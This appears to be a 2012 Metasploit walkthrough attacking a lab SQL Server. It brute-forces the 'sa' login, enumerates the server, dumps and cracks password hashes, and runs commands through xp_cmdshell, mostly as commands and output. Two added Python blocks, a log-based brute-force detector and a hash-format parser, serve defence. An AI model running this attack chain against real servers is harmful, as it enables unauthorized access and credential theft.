302 MSF : Attack Mssql
Posted on 2012-10-10 00:30:55
Version scan
    msf > use auxiliary/scanner/mssql/mssql_login
    msf  auxiliary(mssql_login) > set RHOSTS 5.5.5.3
    RHOSTS => 5.5.5.3
    msf  auxiliary(mssql_login) > set PASS_FILE /tmp/pass
    PASS_FILE => /tmp/pass
    msf  auxiliary(mssql_login) > set RHOSTS 10
    RHOSTS => 10
    msf  auxiliary(mssql_login) > exploit

    [*] 5.5.5.3:1433 - MSSQL - Starting authentication scanner.
    [*] 5.5.5.3:1433 MSSQL - [1/8] - Trying username:'sa' with password:''
    [-] 5.5.5.3:1433 MSSQL - [1/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [2/8] - Trying username:'sa' with password:'sa'
    [-] 5.5.5.3:1433 MSSQL - [2/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [3/8] - Trying username:'sa' with password:'1'
    [-] 5.5.5.3:1433 MSSQL - [3/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [4/8] - Trying username:'sa' with password:'2'
    [-] 5.5.5.3:1433 MSSQL - [4/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [5/8] - Trying username:'sa' with password:'3'
    [-] 5.5.5.3:1433 MSSQL - [5/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [6/8] - Trying username:'sa' with password:'4'
    [-] 5.5.5.3:1433 MSSQL - [6/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [7/8] - Trying username:'sa' with password:'5'
    [-] 5.5.5.3:1433 MSSQL - [7/8] - failed to login as 'sa'
    [*] 5.5.5.3:1433 MSSQL - [8/8] - Trying username:'sa' with password:'123456'
    [+] 5.5.5.3:1433 - MSSQL - successful login 'sa' : '123456'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf  auxiliary(mssql_login) >
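On the server side, the scanner run above shows up as a tight burst of failed 'sa' logins from one client followed by a success. The detector below is an added example, not part of the original post: it reads SQL Server error-log "Logon" lines (the sample lines are constructed to match that layout, not real log data), counts failures per (client, user) in a sliding window, and raises one alert when the burst crosses a threshold and another when a success follows such a burst, which is the signal worth paging on.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample shaped like SQL Server error-log "Logon" entries (not real
# log data): one benign typo from an app account, then a burst of eight failed
# 'sa' logins from a single client followed by a success, as the scanner above
# would produce on the server side.
_LINES = [
    "2012-10-10 00:29:50.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]",
    "2012-10-10 00:29:51.00 Logon       Login succeeded for user 'app_user'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.7]",
]
_LINES += [
    f"2012-10-10 00:30:0{i}.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 5.5.5.9]"
    for i in range(8)
]
_LINES.append(
    "2012-10-10 00:30:08.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 5.5.5.9]"
)
SAMPLE_LOG = "\n".join(_LINES)

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text):
    """Yield {ts, result, user, client} for each Logon line; other lines are ignored."""
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            yield {
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                "result": m["result"],
                "user": m["user"],
                "client": m["client"],
            }


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Flag (client, user) pairs with >= threshold failures inside the window, and
    any success that follows such a burst (a credential that was probably guessed)."""
    failures = defaultdict(deque)   # (client, user) -> timestamps of recent failures
    alerts = []
    for ev in parse_logon_events(text):
        key = (ev["client"], ev["user"])
        q = failures[key]
        while q and ev["ts"] - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if ev["result"] == "failed":
            q.append(ev["ts"])
            if len(q) == threshold:             # alert once per burst, not on every attempt
                alerts.append({"kind": "bruteforce", "client": ev["client"],
                               "user": ev["user"], "at": ev["ts"], "failures": len(q)})
        else:
            if len(q) >= threshold:
                alerts.append({"kind": "bruteforce_success", "client": ev["client"],
                               "user": ev["user"], "at": ev["ts"], "failures": len(q)})
            q.clear()                           # a success ends the failure streak
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately small so the eight-guess run above trips both alerts; on a busy production instance you would tune them, key additionally on the failure State code, and feed the `bruteforce_success` alerts to the on-call rotation rather than a dashboard.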

View the recorded credentials:
    msf  auxiliary(mssql_login) > creds

    Credentials
    ===========

    host     port  user  pass    type      active?
    ----     ----  ----  ----    ----      -------
    5.5.5.3  1433  sa    123456  password  true

    [*] Found 1 credential.
    msf  auxiliary(mssql_login) >

Obtain MSSQL information
    msf  auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
    msf  auxiliary(mssql_enum) > exploit

    [*] Running MS SQL Server Enumeration...
    [*] Version:
    [*]        Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
    [*]                May  3 2005 23:18:38
    [*]                Copyright (c) 1988-2003 Microsoft Corporation
    [*]                Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
    [*] Configuration Parameters:
    [*]         C2 Audit Mode is Not Enabled
    [*]         xp_cmdshell is Enabled
    [*]         remote access is Enabled
    [*]         allow updates is Not Enabled
    [*]         Database Mail XPs is Enabled
    [*]         Ole Automation Procedures is Enabled
    [*] Databases on the server:
    [*]         Database name:master
    [*]         Database Files for master:
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\mastlog.ldf
    [*]         Database name:tempdb
    [*]         Database Files for tempdb:
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\tempdb.mdf
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\templog.ldf
    [*]         Database name:model
    [*]         Database Files for model:
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\model.mdf
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\modellog.ldf
    [*]         Database name:msdb
    [*]         Database Files for msdb:
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\MSDBData.mdf
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\MSDBLog.ldf
    [*]         Database name:pen
    [*]         Database Files for pen:
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\pen.mdf
    [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\pen_log.LDF
    [*] System Logins on this Server:
    [*]         sa
    [*]         BUILTIN\Administrators
    [*] System Admin Logins on this Server:
    [*]         BUILTIN\Administrators
    [*]         sa
    [*] Windows Logins on this Server:
    [*]         No Windows logins found!
    [*] Windows Groups that can logins on this Server:
    [*]         BUILTIN\Administrators
    [*] Accounts with Username and Password being the same:
    [*]         No Account with its password being the same as its username was found.
    [*] Accounts with empty password:
    [*]         No Accounts with empty passwords where found.
    [*] Stored Procedures with Public Execute Permission found:
    [*]         xp_getfiledetails
    [*]         xp_dirtree
    [*]         xp_fixeddrives
    [*]         xp_getnetname
    [*]         xp_enum_activescriptengines
    [*]         xp_fileexist
    [*]         xp_ntsec_enumdomains
    [*]         sp_getbindtoken
    [*]         sp_createorphan
    [*]         sp_droporphans
    [*]         sp_xml_preparedocument
    [*]         sp_xml_removedocument
    [*]         xp_unc_to_drive
    [*]         xp_MSplatform
    [*]         xp_grantlogin
    [*]         xp_IsNTAdmin
    [*]         xp_revokelogin
    [*]         xp_MSnt2000
    [*]         sp_prepexec
    [*]         sp_prepexecrpc
    [*]         sp_unprepare
    [*]         xp_MSLocalSystem
    [*]         sp_reset_connection
    [*]         sp_getschemalock
    [*]         sp_releaseschemalock
    [*]         sp_resyncprepare
    [*]         sp_resyncexecute
    [*]         sp_resyncexecutesql
    [*]         sp_resyncuniquetable
    [*]         sp_refreshview
    [*]         sp_replsetoriginator
    [*]         sp_replincrementlsn
    [*]         sp_repldone
    [*]         sp_repltrans
    [*]         sp_replcounters
    [*]         sp_replcmds
    [*]         sp_replpostschema
    [*]         xp_mergexpusage
    [*]         xp_showlineage
    [*]         sp_replsetsyncstatus
    [*]         xp_mapdown_bitmap
    [*]         xp_showcolv
    [*]         sp_replsendtoqueue
    [*]         sp_replwritetovarbin
    [*]         xp_regread
    [*]         xp_qv
    [*] Instances found on this server:
    [*]         MSSQLSERVER
    [*] Default Server Instance SQL Server Service is running under the privilege of:
    [*]         LocalSystem
    [*] Auxiliary module execution completed
    msf  auxiliary(mssql_enum) >

Obtain user password hashes
    msf  auxiliary(mssql_enum) > use auxiliary/scanner/mssql/mssql_hashdump
    msf  auxiliary(mssql_hashdump) > show options

    Module options (auxiliary/scanner/mssql/mssql_hashdump):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       PASSWORD                              no        The password for the specified username
       RHOSTS                                yes       The target address range or CIDR identifier
       RPORT                1433             yes       The target port
       THREADS              1                yes       The number of concurrent threads
       USERNAME             sa               no        The username to authenticate as
       USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

    msf  auxiliary(mssql_hashdump) > set PASSWORD 123456
    PASSWORD => 123456
    msf  auxiliary(mssql_hashdump) > set RHOSTS 5.5.5.3
    RHOSTS => 5.5.5.3
    msf  auxiliary(mssql_hashdump) > exploit

    [*] Instance Name: nil
    [+] 5.5.5.3:1433 - Saving mssql.hashes = sa:0100400f3764711bbab9342f3ecb2584417a7ecfd548a2ce2c61711bbab9342f3ecb2584417a7ecfd548a2ce2c61
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf  auxiliary(mssql_hashdump) >
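The dumped value is a SQL Server 2000 password hash, and its layout is the reason the "jtr_mssql_fast" step later on is so quick. The parser below is an added example, not part of the original post: it splits the hash copied from the output above into version, salt and digests, recognises the 2005+ and 2012+ layouts as well (the 2005-style and 2012-style values used for comparison are constructed, not taken from any server), and explains the tell-tale of the 2000 format: a second SHA-1 computed over the upper-cased password, so the two 20-byte halves are identical whenever the password has no lowercase letters, and an attacker can ignore case either way.

```python
# Hash string copied from the mssql_hashdump output above (SQL Server 2000 layout).
PAGE_HASH = ("0100400f3764711bbab9342f3ecb2584417a7ecfd548a2ce2c61"
             "711bbab9342f3ecb2584417a7ecfd548a2ce2c61")

# Constructed comparison values, not from the page: the 2005+ layout keeps one
# SHA-1 only, the 2012+ layout uses version 0x0200 and a single SHA-512.
CONSTRUCTED_2005_HASH = "0100" + "deadbeef" + "00" * 20
CONSTRUCTED_2012_HASH = "0200" + "deadbeef" + "11" * 64


def parse_mssql_hash(hex_str):
    """Split a SQL Server password hash into version, salt and digest(s).

    Layouts (hex, as stored in sysxlogins / sys.sql_logins):
      SQL Server 2000:  0100 | 4-byte salt | SHA-1(UTF-16LE(pwd)+salt) | SHA-1(UTF-16LE(UPPER(pwd))+salt)
      SQL Server 2005+: 0100 | 4-byte salt | SHA-1(UTF-16LE(pwd)+salt)
      SQL Server 2012+: 0200 | 4-byte salt | SHA-512(UTF-16LE(pwd)+salt)
    """
    s = hex_str.strip().lower()
    if s.startswith("0x"):
        s = s[2:]
    raw = bytes.fromhex(s)
    version, salt, body = raw[:2], raw[2:6], raw[6:]
    if version == b"\x01\x00" and len(body) == 40:
        fmt, digests = "mssql2000", [body[:20], body[20:]]
    elif version == b"\x01\x00" and len(body) == 20:
        fmt, digests = "mssql05", [body]
    elif version == b"\x02\x00" and len(body) == 64:
        fmt, digests = "mssql12", [body]
    else:
        raise ValueError(f"unrecognised layout: version {version.hex()}, {len(body)} digest bytes")
    info = {
        "format": fmt,
        "version": version.hex(),
        "salt": salt.hex(),
        "hashes": [d.hex() for d in digests],
    }
    if fmt == "mssql2000":
        # The second digest is over UPPER(pwd). Equal halves therefore mean
        # UPPER(pwd) == pwd, i.e. the password contains no lowercase letters.
        info["no_lowercase_letters"] = digests[0] == digests[1]
    return info


def is_valid_mssql_hash(hex_str):
    """True if the string parses as one of the three known layouts."""
    try:
        parse_mssql_hash(hex_str)
        return True
    except ValueError:
        return False


def mssql_hash_risk(hex_str):
    """One-line verdict for an audit report; all three layouts lack a work factor."""
    fmt = parse_mssql_hash(hex_str)["format"]
    return {
        "mssql2000": "high: case-insensitive second digest, guessing ignores letter case",
        "mssql05": "medium: salted SHA-1 with no work factor, cheap to guess offline",
        "mssql12": "medium: salted SHA-512 with no work factor, cheap to guess offline",
    }[fmt]


if __name__ == "__main__":
    for name, value in (("page", PAGE_HASH), ("constructed 2005", CONSTRUCTED_2005_HASH),
                        ("constructed 2012", CONSTRUCTED_2012_HASH)):
        print(name, parse_mssql_hash(value), mssql_hash_risk(value))
```

Running the parser over the page's hash shows both halves equal (the password 123456 has no letters at all), which is consistent with the cracking result further down; the practical consequence for a defender is that any login still carrying a 0x0100 hash with two digests was created on SQL Server 2000 and should have its password reset so the engine re-hashes it in the current format.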

View the loot:
    msf  auxiliary(mssql_hashdump) > loot

    Loot
    ====

    host     service  type          name                        content     info           path
    ----     -------  ----          ----                        -------     ----           ----
    5.5.5.3  mssql    mssql.hashes  5.5.5.3-1433_sqlhashes.txt  text/plain  MS SQL Hashes  /root/.msf4/loot/20120919231400_default_5.5.5.3_mssql.hashes_099023.txt

    msf  auxiliary(mssql_hashdump) >

Password cracking
If there are several users, all of them can be cracked in one run.
    msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast
    msf  auxiliary(jtr_mssql_fast) > exploit

    [*] Seeding wordlist with DB schema info... 0 words added
    [*] Seeding with MSSQL Instance Names....0 words added
    [*] Seeding with hostnames....0 words added
    [*] Seeding with found credentials....2 words added
    [*] Seeding with cracked passwords from John....0 words added
    [*] Seeding with default John wordlist...88395 words added
    [*] De-duping the wordlist....
    [*] Wordlist Seeded with 88395 words
    [*] Cracking MSSQL Hashes
    [*] HashList: /tmp/jtrtmp20120919-14021-ofr4sn
    [*] Trying Wordlist: /tmp/jtrtmp20120919-14021-13nrtm
    guesses: 1  time: 0:00:00:00 DONE (Wed Sep 19 23:15:06 2012)  c/s: 400  trying: SA - !@#$%^
    Use the "--show" option to display all of the cracked passwords reliably
    [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
    [*] Output: 123456           (sa)
    [*] Trying Rule: All4...
    [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
    [*] Output: No password hashes left to crack (see FAQ)
    [*] Trying Rule: Digits5...
    [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
    [*] Output: No password hashes left to crack (see FAQ)
    [*] sa:123456:5.5.5.3:1433

    [*]

    [*] 1 password hash cracked, 0 left

    [*] 1 hashes were cracked!
    [+] Host: 5.5.5.3 Port: 1433 User: sa Pass: 123456
    [*] Cracking MSSQL05 Hashes
    [*] Auxiliary module execution completed
    msf  auxiliary(jtr_mssql_fast) >

Execute commands
    msf > use auxiliary/admin/mssql/mssql_exec
    msf  auxiliary(mssql_exec) > set CMD cmd.exe /c net user
    CMD => cmd.exe /c net user
    msf  auxiliary(mssql_exec) > set PASSWORD 123456
    PASSWORD => 123456
    msf  auxiliary(mssql_exec) > set RHOST 5.5.5.3
    RHOST => 5.5.5.3
    msf  auxiliary(mssql_exec) > exploit
    [*] SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c net user'

    output
    ------

    -------------------------------------------------------------------------------
    Administrator            ASPNET                   Guest
    IUSR_FUZZEXP-F60914C     IWAM_FUZZEXP-F60914C     SUPPORT_388945a0
    \\